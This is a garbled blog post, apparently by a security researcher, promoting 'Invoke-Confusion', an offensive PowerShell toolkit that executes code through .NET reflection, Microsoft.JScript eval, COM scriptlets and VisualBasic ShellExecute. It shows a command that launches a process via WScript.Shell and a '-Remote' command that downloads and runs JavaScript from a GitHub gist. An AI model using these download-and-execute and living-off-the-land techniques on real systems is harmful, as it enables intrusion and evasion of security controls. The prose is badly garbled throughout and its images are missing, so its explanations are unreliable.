invoke-Confusion .NET attacker of Powershell Remotely

3232326668.PNG

Introduction extremely a splendid
Invoke-Confusion is collections of modules Powershell inclusive some researches the modern between them .NET Reflection. Assembly, however, It contains aspects of many units .NET arbitrariness Powershell although our partner in .NET today is @bohops  I’ll display what he has concerning .NET Powershell

Remarking of import Powershell beginning of the loading invoke-Confusion you must choose to load an alongside a focus on strategies .NET Powershell
|===============|
|=   PowerAvails  =|
|=                            =|
|=======================>  https://github.com/homjxi0e/PowerAvails

Capture
Enter a caption

Remarking ( )
That’s not all, we’ll use the three of modules inside an invoke-Confusion they are both invoke-COMScriptlet remote executing invoke-ConfusionJS JavaScript execution of locally and remotely and invoke-VBNET ShellExecute RefAssembly

invoke-ConfusionJS
is a function of loaded via Microsoft.JScript.Eval for executing by ( Microsoft.JScript.Vsa.VsaEngine ) So, you can be implementing javascript code

32323232323232323232323232

This is the value to manually executing concerning JavaScript also We’ll using these methods besides an invoke-Confusion I will arrange clarifying

1 Invoke-Confusion it’s very clear regarding ( Reflection.Assembly ) 

2 We’ll use invoke-Confusion to the purpose it is comfortable

3 Invoke-ConfusionJS simplistically of usage

invoke-ConfusionJS -Command 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("calc.exe")'

Notice of the executing remotely JavaScript also you shouldn’t forget you are aware concerning Invoke-ConfusionJS is inclusive to executing another remotely for example of simplistically, you can create URL using GitHub regarding of code JavaScript

32323232322222.PNG

invoke-ConfusionJS -Remote https://gist.githubusercontent.com/homjxi0e/d36ba0531d4c9e82644370693202f9de/raw/3bc5b5e51695ee562acdf65a35cee45f5201d797/test.js

So, what concerning an invoke-COMScriptlet it drags the file to put it beside an interpreter COM and remotely shape using RefAssembly Microsoft.VisualBasic

3232323222222222222222222222222222.PNG

Noticeable of the use
When you taking scriptlet to put it on PowerShell  you’ll notice Exec is existent in end line that’s a function of Scriptlet code PowerShell it executing a scriptlet via invocation exec from the function COM Object Exec

3232323232323232.PNG

Remarking else
Again We’ll use another module ShellExecute of Microsoft.VisualBasic.interaction also with this pictures I’m going to clarifying how can you use Invoke-Confusion and usage manually concerning Powershell,

32323277

References =>

Download PowerAvails Powershell =>
https://github.com/homjxi0e/PowerAvails

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s